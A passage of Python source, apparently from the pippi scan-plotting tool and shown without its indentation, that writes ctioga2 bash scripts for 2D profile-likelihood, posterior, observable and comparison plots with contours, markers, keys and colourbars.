if doComparison.value: currentSecParse = secParseFilenameFromScriptFiledir+'_'+'_'.join([str(x) for x in plot])
# Get plot limits
xtrema = dictFallback(axisRanges,dataRanges,plot[0])
ytrema = dictFallback(axisRanges,dataRanges,plot[1])
xRange = xtrema[1] - xtrema[0]
yRange = ytrema[1] - ytrema[0]
# Locate and scale logo (if any)
if logoFile.value is not None:
logoCoords = [xtrema[0]+logoLoc.value[0][0]*xRange,ytrema[0]+logoLoc.value[0][1]*yRange]
logoString = '\'\\includegraphics[width = '+str(logoWidth.value*8.8)+'cm]{'+logoFile.value+'}\''
# Determine reference point
if refPoint.value is not None and all([x in refPoint.value for x in plot]):
plotRef = True
refString = ' --draw-marker '+str(refPoint.value[plot[0]])+','+str(refPoint.value[plot[1]])+' '+\
colours.value.referenceMarkerInner+' /color \''+colours.value.referenceMarkerInnerColour+\
'\' /scale '+str(colours.value.referenceMarkerInnerScale)+' \\\n'+\
' --draw-marker '+str(refPoint.value[plot[0]])+','+str(refPoint.value[plot[1]])+' '+\
colours.value.referenceMarkerOuter+' /color \''+colours.value.referenceMarkerOuterColour+\
'\' /scale '+str(colours.value.referenceMarkerOuterScale)+' \\\n'
else:
plotRef = False
# Determine plot size
if plotSize.value is None or plotSize.value is '':
if doColourbar.value is not None and plot in doColourbar.value:
plotSizeInternal = '12.5cm x 4in'
else:
plotSizeInternal = '11cm x 4in'
else:
plotSizeInternal = plotSize.value
# Make profile likelihood plotting scripts
if doProfile.value:
# Get contours
if contours2D.value is not None:
contourLevels = getContours(parseFilename,plot,'like')
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value: markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnProf.value: markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_like2D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_like2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_like2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(contourLevels,'like')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonProfContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainProfContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D)+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D)+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+likeColourbarString+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_like2D.bsh', shell=True)
# Make posterior pdf plotting scripts
if doPosterior.value:
# Get contours
if contours2D.value is not None:
mainContourLevels = getContours(parseFilename,plot,'post')
if doComparison.value: secContourLevels = getContours(secParseFilename,plot,'post')
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnPost.value: markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnPost.value: markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_post2D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_post2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_post2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(mainContourLevels,'post')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse+'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in secContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonPostContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnPost.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in mainContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainPostContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Marg.~posterior\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnPost.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D)+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D)+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse+'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+postColourbarString+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_post2D.bsh', shell=True)
# Make observable plotting scripts
#if doObservable.value:
if obsPlots.value is not None:
for column in obsPlots.value:
# Get contours
if contours2D.value is not None:
contourLevelsLike = getContours(parseFilename,plot,'like')
contourLevelsObs = getContours_obs(parseFilename,plot,column)
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value: markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnProf.value: markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_obs2D_'+str(column)+'.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_obs2D_'+str(column))
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
outfile.write(' --plot '+currentParse+'_obs2D_'+str(column)+'.ct2@1:2:3 ')
#if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(contourLevelsObs,'obs')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonProfContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in contourLevelsLike:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainProfContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D)+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D)+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do colourbar
outfile.write(' --xyz-map\\\n')
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --y2 --plot '+currentParse+'_obs2D_'+str(column)+'_colorbar.ct2@1:2:3 /zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(contourLevelsObs,'obs')+'\' /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[column]+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_obs2D_'+str(column)+'.bsh', shell=True)
# Make profile-posterior comparison plotting scripts
if doProfile.value and doPosterior.value:
# Work out which is the main and which is the comparison
[main, sec] = ['post', 'like'] if PosteriorIsMainInComboPlot else ['like', 'post']
# Get contours
if contours2D.value is not None:
mainContourLevels = getContours(parseFilename,plot,main)
secContourLevels = getContours(parseFilename,plot,sec)
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
if PosteriorIsMainInComboPlot:
# Get details of key for posterior mean
markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
markers.append([colours.value.comparisonBestFitMarker,
colours.value.comparisonBestFitColour,
colours.value.comparisonBestFitColour,
colours.value.comparisonBestFitMarkerScale,
'Best fit'])
else:
# Get details of key for posterior mean
markers.append([colours.value.comparisonPostMeanMarker,
colours.value.comparisonPostMeanColour,
colours.value.comparisonPostMeanColour,
colours.value.comparisonPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(baseFilename+'_'+'_'.join([str(x) for x in plot])+'_combo2D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_combo2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
